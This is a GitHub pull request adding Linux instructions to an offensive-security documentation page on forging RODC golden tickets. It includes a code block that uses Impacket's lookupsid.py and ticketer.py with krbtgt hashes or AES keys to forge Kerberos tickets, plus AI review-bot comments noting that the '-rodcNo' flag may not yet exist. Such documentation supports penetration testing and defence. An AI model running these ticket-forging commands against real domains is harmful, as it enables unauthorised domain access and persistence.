
Add UNIX-like commands for RODC golden ticket #264

Merged
ShutdownRepo merged 2 commits into The-Hacker-Recipes:main from Crqfty:main on May 25, 2026

Contributor

@Crqfty Crqfty commented Apr 14, 2026

Hi,
https://github.com/Greylorn did a pull request to Impacket, adding a new flag "-rodcNo" to ticketer.py, making RODC golden ticket doable from Linux.
fortra/impacket#2169

@qodo-code-review
Contributor

Review Summary by Qodo

Add UNIX-like RODC golden ticket creation documentation

📝 Documentation ✨ Enhancement


Walkthroughs

Description
• Add UNIX-like commands for RODC golden ticket creation
• Document Impacket scripts for domain SID retrieval
• Provide examples with RC4 and AES key variants
• Include custom user/groups IDs configuration example
Diagram
```mermaid
flowchart LR
  A["RODC Golden Ticket<br/>Documentation"] --> B["Find Domain SID<br/>lookupsid.py"]
  A --> C["Create Ticket<br/>ticketer.py"]
  C --> D["RC4 Key<br/>-nthash"]
  C --> E["AES Key<br/>-aesKey"]
  C --> F["Custom IDs<br/>-user-id -groups"]
```


File Changes

1. docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md 📝 Documentation +18/-1

Document RODC golden ticket creation on UNIX-like systems

• Replaced placeholder text with comprehensive UNIX-like implementation guide
• Added note about pending Impacket pull request #2169
• Documented lookupsid.py command for domain SID retrieval
• Provided four ticketer.py command examples covering RC4, AES, and custom ID scenarios

Contributor

qodo-code-review Bot commented Apr 14, 2026

Code Review by Qodo

🐞 Bugs (1)   📘 Rule violations (1)   📎 Requirement gaps (0)
🐞 ⚙ Maintainability (1)
📘 ≡ Correctness (1)


Action required

1. -rodcNo used while pending 📘
Description
The UNIX-like CLI examples use the ticketer.py -rodcNo flag while the surrounding note states the
upstream PR adding -rodcNo is still pending, making these commands likely non-functional when
copy/pasted. This violates the requirement that example commands use valid syntax/flags aligned with
the described intent.
Code

docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md[R21-37]

+> [!NOTE]
+> _At the time of writing, 15th Apr. 2026,_ [_the pull request_](https://github.com/fortra/impacket/pull/2169) _adding the `-rodcNo` is pending._
+
+There are [Impacket](https://github.com/fortra/impacket) scripts for each step of a golden ticket creation : retrieving the domain SID, creating the RODC golden ticket.
+
+```bash
+# Find the domain SID
+lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0
+
+# Create the RODC golden ticket (with an RC4 key, i.e. NT hash)
+ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" "randomuser"
+
+# Create the RODC golden ticket (with an AES 128/256bits key)
+ticketer.py -aesKey "$krbtgtAESkey" -domain-sid "$domainSID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" "randomuser"
+
+# Create the RODC golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids
+ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" -user-id "$USERID" -groups "$GROUPID1,$GROUPID2,..." "randomuser"
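Review bot: The NOTE line at the top of this hunk reads "adding the `-rodcNo` is pending", which is missing its noun; suggest "adding the `-rodcNo` flag is pending". The code block also mixes two placeholder styles: the lookupsid.py line uses literal quoted placeholders ('LMhash:NThash', 'DOMAIN/DomainUser@DomainController') while the ticketer.py lines use shell variables ("$krbtgtNThash", "$DOMAIN"). Pick one convention so readers can tell at a glance which tokens they are expected to replace.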
Evidence
The note explicitly says the PR adding -rodcNo is pending, but the newly added example commands
immediately rely on -rodcNo, which is therefore not a valid/copy-paste-friendly flag for the
currently released tool as described.

docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md[21-37]
Best Practice: Learned patterns

Agent prompt
The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
The doc states the upstream Impacket PR adding `-rodcNo` is pending, but the example commands require `-rodcNo`, so copy/paste usage will likely fail.

## Issue Context
This page is reader-facing documentation and the compliance checklist requires example commands to match described intent and use valid syntax/flags.

## Fix Focus Areas
- docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md[21-37]



Remediation recommended

2. Inconsistent Impacket repo links 🐞
Description
This page links to github.com/fortra/impacket while the rest of the documentation consistently
links to github.com/SecureAuthCorp/impacket, which is confusing and makes it unclear which
upstream repository readers should follow. The inconsistent linking increases the risk that users
follow different upstreams when looking for the referenced scripts/flags.
Code

docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md[24]

+There are [Impacket](https://github.com/fortra/impacket) scripts for each step of a golden ticket creation : retrieving the domain SID, creating the RODC golden ticket.
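Review bot: This sentence opens with "each step of a golden ticket creation" but ends with "creating the RODC golden ticket", so the two halves name different things, and there is a stray space before the colon. Suggest wording it consistently for this page, for example "scripts for each step of RODC golden ticket creation: retrieving the domain SID, then creating the ticket."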
Evidence
The modified page introduces a fortra/impacket link, whereas other forged-ticket docs (and many
other pages) still reference SecureAuthCorp/impacket, so this PR introduces inconsistency rather
than following the repo’s existing convention.

docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md[24-24]
docs/src/ad/movement/kerberos/forged-tickets/golden.md[26-26]
docs/src/ad/movement/kerberos/forged-tickets/silver.md[25-25]

Agent prompt
The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
This page links to a different Impacket upstream (`fortra/impacket`) than the rest of the documentation (`SecureAuthCorp/impacket`). This inconsistency makes it unclear which repo is canonical for readers.

## Issue Context
If the project intends to migrate to `fortra/impacket`, it should be updated consistently across the documentation set; otherwise this page should match the existing convention.

## Fix Focus Areas
- docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md[24-24]
- docs/src/ad/movement/kerberos/forged-tickets/golden.md[26-26]
- docs/src/ad/movement/kerberos/forged-tickets/silver.md[25-25]


Comment on lines +21 to +37
> [!NOTE]
> _At the time of writing, 15th Apr. 2026,_ [_the pull request_](https://github.com/fortra/impacket/pull/2169) _adding the `-rodcNo` is pending._

There are [Impacket](https://github.com/fortra/impacket) scripts for each step of a golden ticket creation : retrieving the domain SID, creating the RODC golden ticket.

```bash
# Find the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0

# Create the RODC golden ticket (with an RC4 key, i.e. NT hash)
ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" "randomuser"

# Create the RODC golden ticket (with an AES 128/256bits key)
ticketer.py -aesKey "$krbtgtAESkey" -domain-sid "$domainSID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" "randomuser"

# Create the RODC golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids
ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" -user-id "$USERID" -groups "$GROUPID1,$GROUPID2,..." "randomuser"

Action required

1. -rodcNo used while pending 📘 Rule violation ≡ Correctness

The UNIX-like CLI examples use the ticketer.py -rodcNo flag while the surrounding note states the
upstream PR adding -rodcNo is still pending, making these commands likely non-functional when
copy/pasted. This violates the requirement that example commands use valid syntax/flags aligned with
the described intent.
Agent Prompt
## Issue description
The doc states the upstream Impacket PR adding `-rodcNo` is pending, but the example commands require `-rodcNo`, so copy/paste usage will likely fail.

## Issue Context
This page is reader-facing documentation and the compliance checklist requires example commands to match described intent and use valid syntax/flags.

## Fix Focus Areas
- docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md[21-37]


@ShutdownRepo
Collaborator

thank you for this contribution
If you'd like your name to be highlighted in this page's authors section, please make another PR with an update to the top of the page 🙂

@ShutdownRepo ShutdownRepo merged commit 72255b7 into The-Hacker-Recipes:main May 25, 2026